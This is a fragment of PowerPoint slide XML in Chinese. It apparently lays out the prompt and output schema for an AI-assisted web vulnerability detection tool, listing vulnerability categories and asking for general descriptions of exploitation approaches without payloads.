              </a:rPr>
              <a:t>业务场景包含的页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>，使用逗号连接，形式如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>xx,xx,xx ]]&gt;&lt;/scene&gt;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&lt;vuln&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>漏洞类型，为字母缩写，支持：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>IDOR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>（越权）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>SSTI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>SQLI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>UPLOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>（文件上传漏洞）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>LFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>（本地文件包含）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>CMD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>（命令注入）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>OTHER&lt;/vuln&gt;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&lt;desc&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>利用方式的自然语言描述，不需要指明要检测的参数，也不可以描述载荷，概括性介绍利用方法即可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>&lt;/desc&gt;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&lt;/solution&gt;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    ...</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&lt;/solutions&gt;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a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>注意：</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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>请尽量发挥创意，发掘更多可能的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>，请仔细分析当前请求，尽量发现所有可能存在的漏洞点</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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>不要进行常规漏洞检测思路，如框架、备份文件漏洞等</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3. OTHER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>类型漏洞可以提出多种检测思路，尽可能多地提出检测思路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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>......</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a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6743700" y="1203325"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7283450" y="1299845"/>
            <a:ext cx="1605915" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>页面库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6722745" y="1884680"/>
            <a:ext cx="2694940" cy="389255"/>
            <a:chOff x="10000" y="3150"/>
            <a:chExt cx="4244" cy="613"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="圆角矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10000" y="3150"/>
              <a:ext cx="4245" cy="613"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 11670"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:prstDash val="dash"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="1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10033" y="3151"/>
              <a:ext cx="4066" cy="612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>id 	页面</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>名称</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>关键信息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p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6723380" y="2400300"/>
            <a:ext cx="2694940" cy="389255"/>
            <a:chOff x="10000" y="3150"/>
            <a:chExt cx="4244" cy="613"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="圆角矩形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10000" y="3150"/>
              <a:ext cx="4245" cy="613"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 11670"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:prstDash val="dash"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="1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10033" y="3151"/>
              <a:ext cx="4066" cy="612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:noAutofit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>id 	页面</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>名称</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>关键信息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p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="图片 30"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5881370" y="1672590"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6770370" y="5987415"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="圆角矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6595745" y="3282950"/>
            <a:ext cx="2973705" cy="1818005"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11670"/>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圆角矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6718935" y="3468370"/>
            <a:ext cx="1382400" cy="389255"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11670"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="1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6749415" y="3469005"/>
            <a:ext cx="1197610" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>列表</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="圆角矩形 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722745" y="3983990"/>
            <a:ext cx="1382395" cy="389255"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11670"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="1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6743700" y="3984625"/>
            <a:ext cx="1278890" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>类型</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="圆角矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722745" y="4566285"/>
            <a:ext cx="1382395" cy="389255"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11670"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="1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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6743700" y="4566920"/>
            <a:ext cx="1361440" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
